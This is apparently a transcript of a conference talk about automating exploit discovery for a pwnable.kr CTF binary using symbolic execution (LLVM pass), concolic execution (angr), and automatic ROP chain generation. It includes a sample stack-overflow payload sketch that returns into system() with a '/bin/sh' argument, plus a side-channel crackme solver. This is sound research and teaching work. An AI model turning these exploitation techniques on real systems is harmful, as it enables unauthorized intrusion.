All right, so this is a slide deck that I put together as kind of an odyssey — my odyssey through exploring this field of creating a system which can automatically exploit an application for me. What's the motivation behind this? As we know, especially if you're in vulnerability research, malware analysis, or any sort of analysis work, a lot of it is manual, and programs and systems have become increasingly difficult to exploit. You have larger attack surfaces, so more areas to look at, and there are more mitigations in a system — stack cookies, heap cookies, different checks in the kernel — things you have to work around and deal with to exploit a program. In reaction to this, people have gotten smarter. Researchers have learned the systems better and created tools to help them analyze these larger programs. So in general, the process gets more involved. A lot of this work is funded by governments, for government-funded activities, or done by pen testers, who write tools to help them analyze the extremely large networks or systems they have to test for a company. And then there's CTF, which is a great example here because it's a small-scale version of the above two: you have smaller problems, and in some cases you write small tools to help you analyze these challenges during a CTF. So my talk today is going to focus on writing an automated exploitation tool — a tool that helps me automatically exploit a program for CTF, because it's the smallest of these three types of targets and a good example. For those of you who aren't familiar, in a CTF you get a binary and you have to own it — exploit it — to get a flag. In the case of governments or pen testers, that might instead be getting a shell or getting something else.
And then you get on scoreboards like this, of course, for fame and glory — so, fake internet points. In the past, how did we do this? Researchers used static analysis — hex editors, digging through the disassembly in IDA — and also dynamic analysis: you're at the terminal running the program and observing the environment, maybe taking memory dumps in a VM, replaying it, doing manual analysis in conjunction with live debugging. But you're still sitting there at a computer using these different tools to dynamically analyze a program — it's still manual. A lot of that is thought-intensive, time-intensive, and maybe CPU-intensive if you're fuzzing a program looking for crashes. An example of this is something I found myself doing more than I care to admit: you're stepping through a program in GDB looking for a crash or an if-branch in a crackme or an obfuscated piece of malware, and suddenly this is you — it's four in the morning, you're still at your terminal stepping through GDB, and you're wondering why on earth you chose this field. But we're smarter than that. We've had stack overflows since the '90s, so we should not have to be doing this manually ever again. We should be able to automate the exploit process so we don't have to be that guy at his terminal at four in the morning. All right, so this is the agenda of my talk today. First, some background on automated exploitation. It's been getting a lot of press recently with the Cyber Grand Challenge in the US, which is research funded by DARPA to create systems that automatically exploit programs as well as automatically generate patches for those programs. And the research behind automated exploitation has narrowed it down to two elements — two different steps you have to do to automatically exploit a program.
The first is to define the bug that you're looking for in terms of primitives. For instance, the simplest example is a stack overflow — memory corruption. You define this sort of bug in terms of read and write primitives, and that way you can encode those primitives into your tool, which will then automatically look for them in the program. Now, there's a lot of interesting work being done on this. Sean Heelan has written some of the first research papers in this field in the past few years; he's based in England and does a lot of program analysis work. There's also David Brumley and his team at Carnegie Mellon — they do a lot of work for CGC, so it's CGC-funded, and their automated bot will potentially be playing as a team at DEF CON this year. All right, so like I said, we're breaking automated exploitation up into two parts. First, you narrow down the vulnerability you're looking for: define its primitives, define the vulnerability that you want your tool to search for. Then you have to figure out: how can I get to that vulnerable piece of code in the program? What sort of input is required to get me there? What state of the system, what state of memory, will get me to that piece of code? A simple example is a crackme: if you enter a certain password, that password will be in memory at a certain location as user input, and when that input is correct, you'll get to the vulnerable piece of code. The second half of the puzzle is to profit from the vulnerability. Once you get there, how can I create a tool that will automatically give me a payload — using the gadgets in the program itself? How can I use this crash that I find dynamically to also get me a shell dynamically, or whatever else I might want to do? Like I said, work is being done in both areas.
Today, I'm going to focus on the first problem — discovery — as well as exploiting it, though I won't go into as much depth on the latter. Just to clarify what I'm talking about for the first part of automated exploitation, discovery of the vulnerability: this is a simple CFG, like you might see in IDA, and the vulnerable piece of code is the red box. That box is unknown to us. In the common approach — fuzzing, for instance — you generate input that gets you down all possible paths, so you touch all possible basic blocks in the program that can execute. Here you have three, and then you'd have to generate more, and it gets exponentially more time-consuming and costly. But obviously this one branch of the CFG is the one we actually want executed — that's our target branch — and we want our tool to automatically return that green line, the target branch in the CFG. For the second part of automated exploitation — profiting from a vulnerability, so automatically generating shellcode or a payload — there's also work being done, and this is just an example project: the LLVM ROP gadget project. It's simply an LLVM pass which takes in a program and gives you a ROP chain built from the gadgets in that program. That's something I found interesting that you might want to check out. All right, so for this talk I figured: if I make a tool, we need a target for it. What should I automatically try to exploit? At the beginning of this talk I mentioned that CTF is the smaller, easier-to-understand version of things like Windows 8 — I'm not going to write a tool that gives me Windows 8 bugs, and I wouldn't be sharing it if I did, sorry. Jeeps are also very common targets — I think the next talk is about cars. But I chose a wargame, a CTF challenge. I don't know if anyone's heard of pwnable.kr.
It's a great site run out of Korea, and there are a bunch of really great pwnable challenges there — some Android ones, some Windows ones, and some interesting ones like this, which is an automated exploitation challenge. And I thought, wow, this is perfect — I can make a tool that will solve this for me. The premise of the challenge is that you connect to a server and have 10 seconds to pwn — get a shell on — a randomly generated binary that they serve down to you in hex, which is awesome. Just to clarify: we have a random binary, and there are some things we can assume about it. We know we can give it input, and we know it does some operations on that input, but those operations change each time. So, just like a real program, we want our tool to be able to handle all types of operations — to just take in a program and solve it for us. We don't want to look into it at all: no opening the program in IDA, no manual dynamic analysis, because we only have 10 seconds. Our tool has to do everything automatically. So the idea is that we want a tool that, first, finds the vulnerability; second, gives us input to make the program crash — finds that green line in the CFG which gets us to the vulnerable basic block; and third, generates a payload automatically that gets us a shell so we can grab the flag. I think this one was worth 500 points, which was pretty good. All right, this is just another depiction of the challenge. We know our input goes here, and all the operations are a black box to us — we don't know what they are and don't have time to look at them. We have to write a tool that solves this, gets us down the green path, and exploits this memory corruption bug — which is what it turned out to be, but we obviously have to infer that automatically. So how can we do this? Sounds kind of like magic, right?
In 10 seconds? That's not a lot of time. How can we do this? This is where program analysis comes in: we want to be able to take this binary and analyze it. So first of all, what is program analysis? Unlike automated exploitation, it's less talked about — it's more of a research topic, and it can seem a little boring initially. But if anyone here has done any compiler theory or compiler back-end work, this is basically where program analysis started, because program analysis is when you write a tool that can look at a program and tell you something about it in terms of correctness and optimization. Optimization, obviously, is very applicable to compilers. Correctness tells us: are all the possible paths we can traverse in a program the expected paths? And optimization — which we don't care about as much — asks: can we make this path any shorter and do effectively the same thing? That's semantic equivalence. All right, so how does this help us with automated exploitation? Taking a step back from defining a program in terms of correctness and looking at program analysis, or software analysis, as a field, you can break it up into three different levels or tiers. At the most basic level you have instrumentation, which is the most commonly used and is fairly manual. As you move down the tiers, you decrease the manual element but increase the program-analysis element. Symbolic and concolic execution are the ones I'm going to focus on today, and I'm going to combine them to make my tool. All right, so what do we care about — how can instrumentation be useful? In program analysis, instrumentation is commonly used to hijack the environment: you make the environment record things about the system at runtime, or change artifacts in the system at runtime to force a certain state in a program.
This allows you to gather and record observations of the running program, hopefully cause the program to go down different paths in the CFG as it runs, and record that — to tell you something about what a vulnerable path could be. A common example of this is fuzzing, where you generate tons and tons of input and have a mutator which generates input intelligently based on the results of the program. Say you know that if your VM is in a certain state you get more code coverage — more code executes — and you want that to happen. You maintain that artifact in the VM to cause it to execute more code, and hopefully keep executing until it reaches a crashing point. That's a very common type of instrumentation. Another common type is instruction counting — kind of a favorite example of mine. You hook into the code and say: every time an instruction is executed, increment a counter. It's very simple, and you just return the total number of instructions executed in any given run. That tells you something about code coverage for a given input to a program. I'll talk more about this and its applications later — it's very useful for crackmes and things like that, but it doesn't have a lot of real-world application. So, symbolic execution. When I started going into this topic I had no clue what it was. Symbolic execution is purely static: it takes in a program, usually in IR — LLVM IR in this case — and it generates a symbolic path for every possible path in the program. This allows you to analyze those paths and say, okay, this path is interesting to me, I want to solve for it — and it will actually give you concrete values for what the variables in that path have to be to make it true, to make that path execute fully. I'll give an example in a second. And this is very useful.
It allows us, first of all, to enumerate all possible execution paths of the program and tells us what the conditions have to be in order for those paths to execute. This is very useful because with fuzzing you may have a case where a certain path is never executed, simply because you never mutate your input or the environment in a way that causes it to execute. With symbolic execution and analysis, because you're enumerating all possible paths statically, you know: hey, this path never got executed under fuzzing — why is that? And symbolic execution will tell you: oh, the value in memory location x has to be four. You can then set that and cause the path to execute. That's why it's faster than brute forcing: instead of potentially running a fuzzer forever, you can immediately tailor your input to what you want. So, an example of symbolic execution. In the base case — the fuzzing case, the normal way of doing it — you generate all possible values of A, B, and C for this program to try to get this assert to trigger. If you're fuzzing, this could actually run forever, because the integers are unbounded; you could run forever and never get this assert to trigger. But in the symbolic execution case, you generate all possible paths. This is a common example people have probably seen: all possible paths are laid out in this tree, you want to get to the one where the assert triggers, and you know the values have to match these conditions. You can feed those conditions to a SAT solver or an SMT solver — Z3, for instance — to give you the values that make the equation true, and then execute down that path. Now, concolic execution is basically symbolic execution, except it includes some concrete execution of the program.
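To make the fuzzing-versus-symbolic contrast concrete, here's a minimal pure-Python sketch. The `target` function, the hand-written path constraints, and the bounded brute-force `solve` (standing in for a real SMT solver like Z3) are all hypothetical illustrations, not the challenge binary:

```python
from itertools import product

# Hypothetical target: the assert-style condition fires on exactly
# one path (a == 0, b < 5, c != 0).
def target(a, b, c):
    x = y = z = 0
    if a != 0:
        x = -2
    if b < 5:
        if a == 0 and c != 0:
            y = 1
        z = 2
    return x + y + z == 3  # True means "the assert would fire"

# Path constraints collected by walking the CFG toward that path.
# A real tool hands these to Z3; a tiny bounded search stands in here.
constraints = [lambda a, b, c: a == 0,
               lambda a, b, c: b < 5,
               lambda a, b, c: c != 0]

def solve(constraints, bound=10):
    # Blind fuzzing over unbounded integers could run forever; solving
    # the three collected constraints directly terminates immediately.
    for a, b, c in product(range(-bound, bound), repeat=3):
        if all(con(a, b, c) for con in constraints):
            return a, b, c
    return None

model = solve(constraints)
print(model, target(*model))  # (0, -10, -10) True
```

The point is the shape of the workflow: enumerate the path you care about, extract its constraints, and ask a solver for a satisfying model, rather than mutating inputs and hoping.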
That's a somewhat wordy way of saying it, but it's simply there to get around things like library loads — things you never want to generate a full set of symbolic paths for. A common example is libc: if your program loads libc at startup, you wouldn't want to generate all possible execution paths through libc, because you'd quickly run out of memory on your computer. Concolic execution lets us execute concretely up until our target point in the program and then symbolically analyze just our target function. It basically saves time for symbolic execution. An example of this — I'll go through it quickly. That's the base case: you concretely execute up to the target point in the program, which is the beginning of this function here with the if statement, and then you build up the symbolic path as you go through that function, basing your input on the constraints that are modeled. It's kind of like a feedback loop, which makes everything go quicker. A feedback loop is a common technique, especially used by the CGC teams in the States: it involves concrete execution and symbolic execution, but also some fuzzing as well. You concretely execute the stuff you don't care about, symbolically look at the path you do care about, and if the constraints aren't tight enough, you can fuzz a little to see what gets you executing farther into the program. This is especially important for larger programs where there's more than one function — the state of function X might rely on the state of function A, which got called three times 40 seconds earlier in the program, or something like that. It's useful for that. All right, so I've talked about what program analysis is, but what are some applications? For instance, instrumentation — the most common one.
Like I said, you've probably heard of these tools — Pin is very powerful, and QEMU. The Pin tool example I'm giving here is based on instruction counting. There was a fun reversing challenge put out last year by FireEye, the Flare-On reversing challenges, and one of them was an obfuscated crackme so large that loading it into IDA crashed it. The simple approach is to use Pin or some instruction counter, which lets us count whether our fuzzed input is executing more code or not. So let's say we fuzz the first character and try everything from A through Z, and we figure out through analysis that the letter F caused more code to be executed — our instruction counter returned a higher number than in all the other cases. Then we move on to the next character, and that continues until you've got the whole flag. That's a simple example of the technique. For symbolic execution there are fewer tools out there — program analysis in this area is definitely newer, especially outside of academia — but common tools are KLEE and SAGE. I believe SAGE is no longer purely a Microsoft-internal tool, or at least parts of it aren't. Either way, a lot of these tools use Z3 as a backend to solve for the paths that are extracted. In my case, I'm going to use an LLVM pass — just using LLVM to pull out the IR of the program and analyze it. So I'm going to show a tool based on pure symbolic execution using LLVM, and then a concolic execution tool as well. For the latter I'm going to use angr, a tool put out by some of the researchers at UCSB. There are other tools out there too, like PySymEmu and Triton. Triton is put out by Quarkslab; it's also quite a powerful tool, and I believe it's on GitHub. So, some assumptions I made going into this: I wanted my tool to find the vulnerability dynamically, but in order to do that, I had to give it some pieces of information.
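The instruction-counting side channel from the Flare-On example can be sketched in miniature. Everything here is hypothetical — a toy `check` routine with an early-exit, byte-at-a-time comparison stands in for the crackme, and a plain Python counter stands in for Pin's per-instruction hook:

```python
import string

SECRET = "flare"   # hidden from the attacker in a real crackme

def check(guess, counter):
    # Each correctly matched prefix character costs one extra counted
    # "instruction" -- that cost difference is the side channel.
    for g, s in zip(guess, SECRET):
        if g != s:
            return False
        counter[0] += 1        # stand-in for Pin's instruction hook
    return len(guess) == len(SECRET)

def recover(length):
    found = ""
    for _ in range(length):
        best, best_count = None, -1
        for ch in string.ascii_lowercase:
            counter = [0]
            # Pad the rest of the guess with filler bytes.
            check(found + ch + "A" * (length - len(found) - 1), counter)
            if counter[0] > best_count:
                best, best_count = ch, counter[0]
        found += best           # keep the letter that executed most
    return found

print(recover(len(SECRET)))     # prints: flare
```

Picking the highest count per position recovers the secret byte by byte — the same idea as fuzzing A through Z and keeping whichever letter made the instruction counter return a higher number.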
In this case, I had to assume it was a memory corruption bug, and I was looking for the read and write primitives which define a simple stack overflow. Here it happened to be a vulnerable memcpy, like I said earlier, but I could still encode that and look for the vulnerability dynamically. I wanted to be able to get to that vulnerability, and I knew I wanted to ROP from there — so there are two different parts to my exploit, and like I said, my tool will dynamically acquire all of these things for me. All right, so my first tool is purely symbolic, using LLVM — it's an LLVM pass operating on bitcode. To do this, I decided to use a dominator tree. A dominator tree is useful because it organizes the CFG for me: instead of blindly traversing different parts of the program, I try to optimize by traversing the longest path first and going from there, on the assumption that the longest path has the most code and therefore, hopefully, the most interesting code. From there, I also had to build my LLVM pass to use something called a use-def chain. Unfortunately, there was no use-def chain support of the kind I needed in LLVM trunk, so I wrote a library that does this as well — you can also find it on GitHub. It's useful because it traces variables and their definitions through the program, across different paths in the dominator tree. This is great because once I find the path I want, I can pull out the use-def chain of each variable and then solve for what those variables have to be after all of the different functions and operations are applied to them, all the way back to when I enter my input. In other words: what does my input have to be so that, after a variable traverses its entire use-def chain, it becomes the value I actually want it to be?
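As a rough illustration of the dominator idea — the toy CFG and the classic iterative dataflow algorithm below are textbook material, not my actual pass, which works on LLVM IR:

```python
# Minimal dominator computation over a toy CFG (adjacency list).
# A node d dominates n if every path from the entry to n goes
# through d; the tool used this structure to order its traversal.
CFG = {
    "entry": ["a", "b"],
    "a": ["c"],
    "b": ["c"],
    "c": ["d"],
    "d": [],
}

def dominators(cfg, entry="entry"):
    nodes = set(cfg)
    preds = {n: set() for n in nodes}
    for n, succs in cfg.items():
        for s in succs:
            preds[s].add(n)
    # Start with "everything dominates everything" and refine.
    dom = {n: set(nodes) for n in nodes}
    dom[entry] = {entry}
    changed = True
    while changed:
        changed = False
        for n in nodes - {entry}:
            new = {n} | (set.intersection(*(dom[p] for p in preds[n]))
                         if preds[n] else set())
            if new != dom[n]:
                dom[n] = new
                changed = True
    return dom

dom = dominators(CFG)
print(sorted(dom["c"]))  # ['c', 'entry']: neither a nor b dominates c
```

From the dominator sets you can build the dominator tree (each node's immediate dominator is its closest strict dominator) and then prioritize the deepest, longest chains first, which is the heuristic described above.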
I kind of termed this flow-sensitive constraint analysis, because I'm looking for the constraining elements of the path. All right, so the great thing about LLVM is that this turned out to be easy to build. If you haven't looked into the LLVM project, it's a really powerful tool for program analysis, and specifically for symbolic execution, because a pass is static analysis applied to a program, and you can pull out the semantics of the different variables very easily — that's why building a use-def chain for each variable turned out to be rather easy. The one difficulty I had: if you don't have the source code, it's not as easy to compile down to LLVM bitcode — obviously you have to actually lift the binary and translate it into LLVM bitcode. I used McSema here because it was an x86 binary, but you can use other tools as well; that's a separate research area being looked into, and I've yet to determine which is fastest. Oh — you can download the pass at this URL if you want. Then I used angr for the concolic tool to solve this problem. I'm not going to go into all the details here, but because it's concolic execution, I want to start out with a blank project. What angr actually does is load the program almost like loading it into a VM, or into an instance of QEMU — it's a blank slate. Then I told it to execute all the way up to the entry function, the function I care about: concretely execute all the libraries and build the state of the program, so all of libc and everything else is in there, and then start analyzing at this entry function. These are all just elements of angr. The important thing here was my input buffer: I knew that my input buffer is what I wanted to solve for, and all these operations get applied to it.
At the end, I want to know what my input buffer has to be so that, after all the operations, it gets me down the path which contains this vulnerable address here. So angr is going to solve and give me the input I need to pass all the checks — all the operations applied to it — and it does this automatically, which is awesome. They also use Z3 as a backend. And this is just the way you print things out: angr is interesting because it's actually storing the input you need in memory, so you technically have to dump memory from this virtual machine to get the input you need. All right, so I'm going to show both tools in action — I kind of imagined it as a race against each other. This is the angr tool being run; I just locally hosted the pwnable's binary in this case. All right, I'll stop it there. You can see here that it's pulling out the different constraints being applied — in this case it was XORing even and odd bytes of my input, and my tool found that. It found the vulnerable memcpy in the program: these are the conditions, this is the vulnerability. And it found that these are bad paths — paths which exit and do not get me to the vulnerable memcpy — which might be interesting to know later on. And then it also solved my path. Now, like I said, I was focusing on the first half of the automated exploitation problem today — finding the input necessary to get to the vulnerability, as well as finding the vulnerability itself. But in order to get the shell, I also had to automatically generate a ROP chain, for which I used the LLVM project I linked to earlier, and that ends up being the final payload. Total elapsed time wasn't even three seconds, so that's pretty good, and you can see here that I got a shell. Now we're going to run the LLVM tool that I made — this one does purely static analysis on the program.
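For a sense of what assembling the final payload looks like, here's a hedged Python sketch. The addresses, the 44-byte offset, and the simple return-into-system() chain are all made-up illustrative values — in the actual run the gadgets and offsets were discovered automatically, and the solved input that satisfies the path constraints would precede this corruption part:

```python
import struct

# Hypothetical 32-bit addresses -- illustrative only, not from the
# real binary.
SYSTEM_PLT = 0x08048430   # system() entry in the PLT
BINSH_ADDR = 0x0804a024   # pointer to a "/bin/sh" string
OFFSET     = 44           # padding to reach the saved return address

payload  = b"A" * OFFSET                  # filler up to saved EIP
payload += struct.pack("<I", SYSTEM_PLT)  # return into system()
payload += struct.pack("<I", 0xdeadbeef)  # fake return address
payload += struct.pack("<I", BINSH_ADDR)  # argument: "/bin/sh"
print(payload.hex())
```

The `<I` format packs each address as a little-endian 32-bit word, which is how the chain has to land on an x86 stack.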
You'd assume that the concolic execution script, because it concretely runs some things, would be faster — but in this case, symbolic execution was actually faster, which I found really interesting. Going through it again: it found the same things. I printed out a little less, I guess, but these are the operations that were applied to my input, and this is the input I needed, which matches. In this case, I used the same tool to generate the ROP chain, so it was the same ROP chain, and I got a shell. The interesting thing is that it was faster than the concolic script, and I believe this is because of my dominator tree method: because I was using the dominator tree to traverse all possible paths in the program, it found the vulnerability faster — and that is actually the most time-consuming part, which makes sense, because discovery is always the hardest part, even automated discovery. So this is the shell — thanks. Moving on: like I said, you can download the scripts that do both of those things online, as well as the LLVM project I started for use-def chain and dominator tree analysis of programs. That one's more for bug discovery than for exploitation, but still pretty useful. As for the future of exploitation — it's tough, right, because we're still working with binaries, and these applications and programs are getting harder and harder to analyze. Take Chrome and the Chrome sandbox: it's very difficult to look at these things because they're so complex, with so many different mitigations and defenses on them. Which is great — defenses are getting better, our programs are being hardened. And like I said before, source is nice to have, because in order to do a lot of program analysis, like with LLVM, you need to compile down to bitcode or an intermediate representation.
In the case of binaries, once you have machine code it's very difficult to go backwards into the IR necessary to do program analysis. So you need tools that either run the machine code directly, like QEMU or Pin, or tools like McSema to lift the code up into IR — and that's a separate problem. Another difficulty for future research: it's easy to encode the primitives of memory corruption. Stack overflows have been around since the '90s, so those read and write primitives are easier to encode into a static analysis pass — you can look for a buffer, see that it's copied, see that it's written into a location whose length could be wrong, and then solve for a case where the destination's length is less than the length of your buffer. That's something simple, something Z3 could solve for. My company has also released a tool for use-after-free primitives; bugs like that are easier to look at too. You simply build the use-def chain and say: okay, this variable is used down here, but there is a potential path in the program's execution where that variable or object is freed. That's something simple you can do with static analysis on all possible program paths. But harder bugs — logic bugs and the like — require more understanding of, or introspection into, the program. So, like I said, automated exploitation seems to be the direction people are going. Can we define a program in terms of its correctness? This is useful because — why repeat something twice? Programs are getting larger, but if we can transcribe a vulnerability into a tool that looks for it automatically, that will end up being the way to go. And if we can prove that a program is free of a certain class of bugs, that's something as well.
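That length reasoning — "solve for a case where the copy length exceeds the destination" — can be written down as a sketch. The buffer size and the attacker-derived length computation below are hypothetical, and a bounded search again stands in for Z3:

```python
# Encoding a memcpy-style write primitive as a constraint (sketch).
# dst is 16 bytes; the copy length is derived from attacker input:
#   n = input_byte * 4
# The primitive "fires" when n > len(dst), i.e. the write runs past
# the buffer.  Z3 would solve this symbolically; here we search.
DST_SIZE = 16

def copy_length(input_byte):
    # Hypothetical length computation lifted from the binary.
    return input_byte * 4

def find_overflowing_input():
    for b in range(256):                 # one symbolic input byte
        if copy_length(b) > DST_SIZE:    # the overflow constraint
            return b
    return None

print(find_overflowing_input())  # 5 -> copies 20 bytes into a 16-byte dst
```

The interesting part is that the vulnerability is expressed purely as a constraint over the program's dataflow — exactly the kind of condition a pass can check on every copy site it finds.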
We could say: this program is provably secure; this program has been proven to not contain any memory corruption bugs, or something like that. So that's also an area to go into. I'd like to thank Trail of Bits, and pwnable.kr for letting me use their binary without even knowing it. And RPISEC, my CTF team, will be playing this weekend — we have two teams here, so go bother them. Any references I mentioned are right here. If there are any questions, I can take them now, or talk to me after. Thank you.